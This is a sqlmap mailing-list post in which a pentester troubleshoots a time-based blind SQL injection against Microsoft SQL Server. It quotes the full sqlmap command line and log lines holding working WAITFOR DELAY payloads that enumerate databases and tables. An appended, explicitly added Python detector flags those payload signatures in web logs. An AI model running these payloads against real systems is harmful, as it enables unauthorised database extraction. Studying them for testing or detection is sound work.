Hi everybody

I'm doing a Pentest and I'm able to do a time based blind sql injection
on a very big database.

It takes some time, but that's fine for now. But sqlmap is failing when
it comes to retrieving the *number of [databases, tables, columns,
whatever]*:

$ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
--os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
--time-sec=2 --proxy socks5://localhost:5050 --dbs -o
[...snip...]
[11:57:49] [INFO] confirming Microsoft SQL Server
[11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.X.XXXXX (redacted)
back-end DBMS: Microsoft SQL Server 2008
[11:57:49] [INFO] fetching database names
[11:57:49] [INFO] fetching number of databases
[11:57:49] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
[11:57:49] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
[11:58:25] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
[11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
[11:59:55] [INFO] retrieved:
[11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
[11:59:55] [WARNING] in case of continuous data retrieval problems you
are advised to try a switch '--no-cast' or switch '--hex'
[11:59:55] [ERROR] unable to retrieve the number of databases

However, for the *database names* sqlmap will continue with the
DB_NAME(X) technique. Right now it is dumping out all the different
database names, which works fine:

[15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
WAITFOR DELAY '0:0:2'; --

Because I got many of the following errors (and the occurrence of the
error is random), I patched the time delay in the python code to be
fixed to 2 seconds (maybe you want to have an option for that):

[15:03:14] [ERROR] invalid character detected. retrying..
[15:03:14] [WARNING] increasing time delay to 3 seconds

That works fine and I get good results. However, when I try to dump
table names now (from one of the known databases) with the -D DB_NAME
and --tables switch, it is again failing to retrieve the number of tables:

[14:51:53] [INFO] fetching tables for database: DB_NAME
[14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
[14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
WAITFOR DELAY '0:0:10'; --
[14:51:53] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[14:52:26] [CRITICAL] considerable lagging has been detected in
connection response(s). Please use as high value for option '--time-sec'
as possible (e.g. 10 or more)
[14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
WAITFOR DELAY '0:0:10'; --
[14:52:56] [WARNING] it is very important not to stress the network
adapter during usage of time-based payloads to prevent potential errors
[14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
WAITFOR DELAY '0:0:10'; --
[14:54:56] [INFO] retrieved:
[14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
[...]
[14:57:27] [INFO] retrieved:
[14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
[...]
[14:59:57] [INFO] retrieved:
[14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
[14:59:57] [WARNING] unable to retrieve the number of tables for
database 'DB_NAME'
[14:59:57] [CRITICAL] unable to retrieve the tables for any database

Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
help. Using --start and --stop also didn't work. I can't get any data
out of it like this.

Best regards,
floyd
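A defender-side companion to the payloads quoted in the post, added here as an example (it is not part of the original message or of sqlmap): it URL-decodes the request path of each web-server log entry and flags the three signatures visible in the probes above (the WAITFOR DELAY primitive, the UNICODE(SUBSTRING(...)) per-character comparison, and references to MSSQL catalog objects such as master..sysdatabases, ..sysobjects, fn_varbintohexstr and DB_NAME()). The combined log format, client addresses and paths are assumptions, and the sample entries are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the time-based blind probes quoted in the post: the delay
# primitive, the per-character comparison, and MSSQL catalog references.
SIGNATURES = {
    "waitfor_delay": re.compile(r"WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "char_compare": re.compile(r"UNICODE\s*\(\s*SUBSTRING\s*\(", re.I),
    "mssql_catalog": re.compile(
        r"master\.\.sysdatabases|\.\.sysobjects|fn_varbintohexstr|DB_NAME\s*\(", re.I),
}

# Assumed combined log format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample entries (not from the original post); the two probe lines carry
# URL-encoded copies of the COUNT(name) and DB_NAME() payloads seen in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2014:11:57:49 +0200] "GET /search.aspx?q=%27%3B+IF%28UNICODE%28SUBSTRING%28%28SELECT+ISNULL%28CAST%28LTRIM%28STR%28COUNT%28name%29%29%29+AS+NVARCHAR%284000%29%29%2CCHAR%2832%29%29+FROM+master..sysdatabases%29%2C1%2C1%29%29%3E51%29+WAITFOR+DELAY+%270%3A0%3A2%27%3B+-- HTTP/1.1" 200 1532
10.0.0.5 - - [12/Oct/2014:11:58:25 +0200] "GET /search.aspx?q=hello+world HTTP/1.1" 200 1532
10.0.0.5 - - [12/Oct/2014:15:08:34 +0200] "GET /search.aspx?q=%27%3B+IF%28UNICODE%28SUBSTRING%28%28SELECT+ISNULL%28CAST%28DB_NAME%28110%29+AS+NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C16%2C1%29%29%21%3D109%29+WAITFOR+DELAY+%270%3A0%3A2%27%3B+-- HTTP/1.1" 200 1532
10.0.0.9 - - [12/Oct/2014:15:09:01 +0200] "GET /docs/index.html HTTP/1.1" 200 8810
"""

def scan_request(raw_path):
    """Return the names of the signatures found in one URL-encoded request path."""
    decoded = unquote_plus(raw_path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Return one finding per suspicious entry: (line_no, client, signature names)."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guess
        client, _ts, _method, path, _status = m.groups()
        hits = scan_request(path)
        if hits:
            findings.append((no, client, hits))
    return findings

def clients_to_review(findings, min_hits=2):
    """Collapse findings to clients that sent repeated probes (one hit may be noise)."""
    counts = {}
    for _no, client, _hits in findings:
        counts[client] = counts.get(client, 0) + 1
    return {c: n for c, n in counts.items() if n >= min_hits}
```

Running `scan_log(SAMPLE_LOG)` flags entries 1 and 3 from 10.0.0.5 with all three signatures, and `clients_to_review` reduces that to one client worth looking at; a real deployment would feed it the live access log and correlate with the long, regular response times these probes produce.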

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users